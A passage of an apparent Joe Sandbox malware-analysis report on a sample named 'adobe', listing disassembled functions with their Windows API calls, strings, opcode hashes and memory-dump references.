                                                                                                                                                          • Instruction Fuzzy Hash: 9E218EB67042019FD700DE69CD85E6BB7EEEBC4304F14CA2AF594C7349D634E9448796
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00417228 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32 ref: 00417270
                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004172B3
                                                                                                                                                          • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                                                                                                          • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1959210111-0
                                                                                                                                                          • Opcode ID: 1f027ba62758c6f6e16121a435271ae36784e877d78f723a05b38686a1b288de
                                                                                                                                                          • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                                                                                                          • Opcode Fuzzy Hash: 1f027ba62758c6f6e16121a435271ae36784e877d78f723a05b38686a1b288de
                                                                                                                                                          • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00493C40 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493C55
                                                                                                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493C69
                                                                                                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493C7D
                                                                                                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493C9B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                          • Instruction ID: 8abd8040eba731fbe526ab5f7b53f6c2a8ab0f8d37bf7bd3a460e12037392c69
                                                                                                                                                          • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                                          • Instruction Fuzzy Hash: 7F112E72604604ABCF40DEA9D8C4D9B7BECEF4D364B1441AAF918EB246D634ED408BA4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041F490 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                                                                                                          • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                                                                                                          • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                                                                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4025006896-0
                                                                                                                                                          • Opcode ID: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                                                                                          • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                                                                                                          • Opcode Fuzzy Hash: 9da16f95b0ca95f6f98f2aa1ee6ab2fa4b74d09379c763118f1aaf581a933dc1
                                                                                                                                                          • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040D210 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                                                                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758,0000000A,REGDLL_EXE), ref: 0040D241
                                                                                                                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B758), ref: 0040D25B
                                                                                                                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                          • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                                                                          • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                                                                                                          • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                                                                                                          • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046EF3C Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046EF8D
                                                                                                                                                          Strings
                                                                                                                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046EF73
                                                                                                                                                          • Setting NTFS compression on directory: %s, xrefs: 0046EF5B
                                                                                                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046EF9E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                                                          • API String ID: 1452528299-1392080489
                                                                                                                                                          • Opcode ID: 70e1dcd70b450565549ad8351c6ba8376395d31221726c645a1b23065240a2c2
                                                                                                                                                          • Instruction ID: 90f263befbfc2ed38cb9fa519f29dd23f6ca26fd9398365abe1a4f1750a61a51
                                                                                                                                                          • Opcode Fuzzy Hash: 70e1dcd70b450565549ad8351c6ba8376395d31221726c645a1b23065240a2c2
                                                                                                                                                          • Instruction Fuzzy Hash: D9016730E0828867CF08D7EE60412DDBBE49F4D354F5481EFB458DB282EB7905088BAB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004552C8 Relevance: 6.0, APIs: 4, Instructions: 41registrywindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000,0045AFF5), ref: 00455304
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AFCE,?,?,?,?,?,00000000), ref: 0045530D
                                                                                                                                                          • RemoveFontResourceA.GDI32(00000000), ref: 0045531A
                                                                                                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045532E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4283692357-0
                                                                                                                                                          • Opcode ID: 12e5d50a70df0223fb4e5adef86696197cf9ed238cf81687b75c51c125de9243
                                                                                                                                                          • Instruction ID: 52e3aeb2f0b2f45aa49b8753349bc449d62e6f0ad3e8c43972c27c65c40ff478
                                                                                                                                                          • Opcode Fuzzy Hash: 12e5d50a70df0223fb4e5adef86696197cf9ed238cf81687b75c51c125de9243
                                                                                                                                                          • Instruction Fuzzy Hash: 48F054B575070036EA10B6B69C47F5B168C9F54745F10483BB904EF2C3D97CD804962D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046F6E8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0046F739
                                                                                                                                                          Strings
                                                                                                                                                          • Unsetting NTFS compression on file: %s, xrefs: 0046F71F
                                                                                                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046F74A
                                                                                                                                                          • Setting NTFS compression on file: %s, xrefs: 0046F707
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                                                          • API String ID: 1452528299-3038984924
                                                                                                                                                          • Opcode ID: bdfa13107025dcd78ac457e81406d0b5a6157c74cf38ea943c4e55576a3d71ef
                                                                                                                                                          • Instruction ID: f59cf1e2ce1af00abf56b5bc0a41f2d9024385d3f2bbc815d9fc5944cd6688d7
                                                                                                                                                          • Opcode Fuzzy Hash: bdfa13107025dcd78ac457e81406d0b5a6157c74cf38ea943c4e55576a3d71ef
                                                                                                                                                          • Instruction Fuzzy Hash: 77014430E082485ACF14DBE9B0512DDBBA4AF09355F4485FB7498D7282EA79090C97AA
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047B994 Relevance: 6.0, APIs: 4, Instructions: 35sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CountSleepTick
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2227064392-0
                                                                                                                                                          • Opcode ID: 7f04e0f05680e82646a7c67b04eda29bcd00b6381a5fcaa2afde3976f5337cae
                                                                                                                                                          • Instruction ID: f3e139474b33760e13a41918489e3ce7d48b14196341e5dbc503218970ea5f8b
                                                                                                                                                          • Opcode Fuzzy Hash: 7f04e0f05680e82646a7c67b04eda29bcd00b6381a5fcaa2afde3976f5337cae
                                                                                                                                                          • Instruction Fuzzy Hash: 61E0E5F3309504458A2035BF2C837EF4688CA853A4B14553FF398D6282C5184C0545AE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00476E20 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E,00000000), ref: 00476E29
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB,?,?,?,?,?,0049739E), ref: 00476E2F
                                                                                                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB), ref: 00476E51
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047FACB), ref: 00476E62
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 215268677-0
                                                                                                                                                          • Opcode ID: e2728acfe09f276dde31732de6b3ef75bc87fd409fbda21e3683c02b7b2e0786
                                                                                                                                                          • Instruction ID: 2b0e864392e04d63d4be4d22317bf8a61354631aa83d71046a7a405fca67f8c6
                                                                                                                                                          • Opcode Fuzzy Hash: e2728acfe09f276dde31732de6b3ef75bc87fd409fbda21e3683c02b7b2e0786
                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0A0A02407006BDA00EAB5CC82E9B73DCEB44714F04883A7E98C72C2D638DC08AB36
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00424250 Relevance: 6.0, APIs: 4, Instructions: 26windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 0042426D
                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 00424277
                                                                                                                                                          • SetForegroundWindow.USER32(?), ref: 00424281
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2280970139-0
                                                                                                                                                          • Opcode ID: 82c5499aa3392c3e403b9f4de3da674b7760f040ec75a9184635b640fb16ef5d
                                                                                                                                                          • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                                                                                                          • Opcode Fuzzy Hash: 82c5499aa3392c3e403b9f4de3da674b7760f040ec75a9184635b640fb16ef5d
                                                                                                                                                          • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406284 Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GlobalHandle.KERNEL32 ref: 00406287
                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040628E
                                                                                                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406299
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Global$AllocHandleWire
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2210401237-0
                                                                                                                                                          • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                                                                          • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                                                                                          • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                                                                                          • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046A11C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 262windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A32D
                                                                                                                                                          • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A333
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$EnableItemSystem
                                                                                                                                                          • String ID: CurPageChanged
                                                                                                                                                          • API String ID: 3692539535-2490978513
                                                                                                                                                          • Opcode ID: 9433ae3e8c0d8cef7e1db9c76da1d64c1d3fe783aa42d9efde8d789ed8796f27
                                                                                                                                                          • Instruction ID: 09a3f119f95f3e8b80b2758de21f208edffb37633c658fb2599a7cba3a6cac5e
                                                                                                                                                          • Opcode Fuzzy Hash: 9433ae3e8c0d8cef7e1db9c76da1d64c1d3fe783aa42d9efde8d789ed8796f27
                                                                                                                                                          • Instruction Fuzzy Hash: FBB13734644504DFC711DB99CA89AA973F5EF49304F2540F6F808AB322DB39AE51DF4A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00478FF8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 210registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A869,?,00000000,00000000,00000001,00000000,00479295,?,00000000), ref: 00479259
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to parse "reg" constant, xrefs: 00479260
                                                                                                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 004790CD
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                                                                                          • API String ID: 3535843008-1938159461
                                                                                                                                                          • Opcode ID: 5287f0b1ae5120a3cff67f0f9c2f0b6d3246ff0ddf6e1fab1b6f496d44585299
                                                                                                                                                          • Instruction ID: 835d74a0d62e725ebcdd17b5ae281fba2600a31c0460f99f6913a21494258781
                                                                                                                                                          • Opcode Fuzzy Hash: 5287f0b1ae5120a3cff67f0f9c2f0b6d3246ff0ddf6e1fab1b6f496d44585299
                                                                                                                                                          • Instruction Fuzzy Hash: 54814374E04148AFCB10EF95D481ADEBBF9AF49314F50C1AAE814B7392D7389E05CB99
                                                                                                                                                          Uniqueness

